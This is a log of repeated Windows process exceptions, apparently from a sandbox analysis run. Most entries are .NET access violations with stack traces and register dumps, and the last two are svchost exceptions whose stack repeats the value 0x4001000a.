__exception__ Dec. 11, 2023, 7:15 p.m.	stacktrace: 0x94fde40 0x94fa0e0 0x94f9b91 0x94f9ac5 0x94f8b40 0x94f7e90 0x74c96a 0x746b8d 0x74676e 0x743483 0x742ee8 0x742e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73dd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73de264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73de2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73f21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73f21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73f21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73f2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7447f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x94fde83 registers.esp: 2548692 registers.edi: 2548976 registers.eax: 0 registers.ebp: 2548700 registers.edx: 0 registers.ebx: 2551364 registers.esi: 38538176 registers.ecx: 40405440	1
__exception__ Dec. 11, 2023, 7:15 p.m.	stacktrace: 0x94fde40 0x94fa0e0 0x94f9b91 0x94f9ac5 0x94f8b40 0x94f7e90 0x74c96a 0x746b8d 0x74676e 0x743483 0x742ee8 0x742e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73dd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73de264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73de2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73f21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73f21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73f21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73f2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7447f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x94fde83 registers.esp: 2548692 registers.edi: 2548976 registers.eax: 0 registers.ebp: 2548700 registers.edx: 0 registers.ebx: 2551364 registers.esi: 38538176 registers.ecx: 41710040	1
__exception__ Dec. 11, 2023, 7:15 p.m.	stacktrace: 0x94f7e90 0x74c96a 0x746b8d 0x74676e 0x743483 0x742ee8 0x742e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73dd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73de264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73de2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73f21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73f21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73f21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73f2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7447f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 39 09 e8 05 93 88 68 89 85 ec fc ff ff 8d bd e4 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x94f8e54 registers.esp: 2549080 registers.edi: 2550220 registers.eax: 0 registers.ebp: 2550256 registers.edx: 0 registers.ebx: 2551364 registers.esi: 2549792 registers.ecx: 0	1
__exception__ Dec. 11, 2023, 7:15 p.m.	stacktrace: 0x94fde40 0x94ff0fe 0x94feb50 0x94f9aad 0x94f9319 0x94f7e90 0x74c96a 0x746b8d 0x74676e 0x743483 0x742ee8 0x742e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73dd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73de264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73de2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73f21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73f21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73f21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73f2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7447f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x94fde83 registers.esp: 2548652 registers.edi: 2548992 registers.eax: 0 registers.ebp: 2548660 registers.edx: 0 registers.ebx: 2551364 registers.esi: 38538176 registers.ecx: 43020920	1
__exception__ Dec. 11, 2023, 7:15 p.m.	stacktrace: 0x94fde40 0x94ff0fe 0x94feb50 0x94f9ac5 0x94f9319 0x94f7e90 0x74c96a 0x746b8d 0x74676e 0x743483 0x742ee8 0x742e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73dd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73de264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73de2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73f21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73f21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73f21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73f2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7447f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x94fde83 registers.esp: 2548652 registers.edi: 2548992 registers.eax: 0 registers.ebp: 2548660 registers.edx: 0 registers.ebx: 2551364 registers.esi: 38538176 registers.ecx: 39675584	1
__exception__ Dec. 11, 2023, 7:15 p.m.	stacktrace: 0x94fde40 0x94ff0fe 0x94feb50 0x94f9ac5 0x94f9319 0x94f7e90 0x74c96a 0x746b8d 0x74676e 0x743483 0x742ee8 0x742e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73dd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73de264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73de2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73f21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73f21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73f21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73f2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7447f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x94fde83 registers.esp: 2548652 registers.edi: 2548992 registers.eax: 0 registers.ebp: 2548660 registers.edx: 0 registers.ebx: 2551364 registers.esi: 38538176 registers.ecx: 41025256	1
__exception__ Dec. 11, 2023, 7:15 p.m.	stacktrace: 0x94fde40 0x94ff7c2 0x94ff3a0 0x94f9aad 0x94f941b 0x94f7e90 0x74c96a 0x746b8d 0x74676e 0x743483 0x742ee8 0x742e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73dd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73de264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73de2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73f21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73f21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73f21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73f2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7447f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x94fde83 registers.esp: 2548716 registers.edi: 2548992 registers.eax: 0 registers.ebp: 2548724 registers.edx: 0 registers.ebx: 2551364 registers.esi: 38538176 registers.ecx: 42374992	1
__exception__ Dec. 11, 2023, 7:15 p.m.	stacktrace: 0x94fde40 0x94ff7c2 0x94ff3a0 0x94f9ac5 0x94f941b 0x94f7e90 0x74c96a 0x746b8d 0x74676e 0x743483 0x742ee8 0x742e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73dd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73de264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73de2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73f21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73f21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73f21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73f2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7447f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x94fde83 registers.esp: 2548716 registers.edi: 2548992 registers.eax: 0 registers.ebp: 2548724 registers.edx: 0 registers.ebx: 2551364 registers.esi: 38538176 registers.ecx: 39135100	1
__exception__ Dec. 11, 2023, 7:15 p.m.	stacktrace: 0x94fde40 0x94ff7c2 0x94ff3a0 0x94f9ac5 0x94f941b 0x94f7e90 0x74c96a 0x746b8d 0x74676e 0x743483 0x742ee8 0x742e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73dd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73de264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73de2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73f21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73f21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73f21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73f2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7447f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x94fde83 registers.esp: 2548716 registers.edi: 2548992 registers.eax: 0 registers.ebp: 2548724 registers.edx: 0 registers.ebx: 2551364 registers.esi: 38538176 registers.ecx: 40533304	1
__exception__ Dec. 11, 2023, 7:15 p.m.	stacktrace: 0x94fde40 0x94ffcca 0x94ff8f0 0x94f9aad 0x94f9508 0x94f7e90 0x74c96a 0x746b8d 0x74676e 0x743483 0x742ee8 0x742e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73dd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73de264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73de2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73f21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73f21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73f21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73f2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7447f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x94fde83 registers.esp: 2548736 registers.edi: 2548992 registers.eax: 0 registers.ebp: 2548744 registers.edx: 0 registers.ebx: 2551364 registers.esi: 38538176 registers.ecx: 41931576	1
__exception__ Dec. 11, 2023, 7:15 p.m.	stacktrace: 0x94fde40 0x94ffcca 0x94ff8f0 0x94f9ac5 0x94f9508 0x94f7e90 0x74c96a 0x746b8d 0x74676e 0x743483 0x742ee8 0x742e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73dd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73de264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73de2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73f21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73f21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73f21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73f2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7447f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x94fde83 registers.esp: 2548736 registers.edi: 2548992 registers.eax: 0 registers.ebp: 2548744 registers.edx: 0 registers.ebx: 2551364 registers.esi: 38538176 registers.ecx: 38935484	1
__exception__ Dec. 11, 2023, 7:15 p.m.	stacktrace: 0x94fde40 0x94ffcca 0x94ff8f0 0x94f9ac5 0x94f9508 0x94f7e90 0x74c96a 0x746b8d 0x74676e 0x743483 0x742ee8 0x742e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73dd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73de264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73de2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73f21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73f21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73f21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73f2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7447f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x94fde83 registers.esp: 2548736 registers.edi: 2548992 registers.eax: 0 registers.ebp: 2548744 registers.edx: 0 registers.ebx: 2551364 registers.esi: 38538176 registers.ecx: 40292968	1
__exception__ Dec. 11, 2023, 7:15 p.m.	stacktrace: 0x94fde40 0x6040d0f 0x60404e1 0x94f7ebe 0x74c96a 0x746b8d 0x74676e 0x743483 0x742ee8 0x742e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73dd2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73de264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73de2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e97610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73f21dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73f21e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73f21f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73f2416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7447f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x94fde83 registers.esp: 2549648 registers.edi: 2549928 registers.eax: 0 registers.ebp: 2549656 registers.edx: 0 registers.ebx: 2551364 registers.esi: 40860464 registers.ecx: 40867548	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefdbfa49d svchost+0xd117f @ 0x95117f 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x4001000a exception.offset: 42141 exception.address: 0x7fefdbfa49d registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
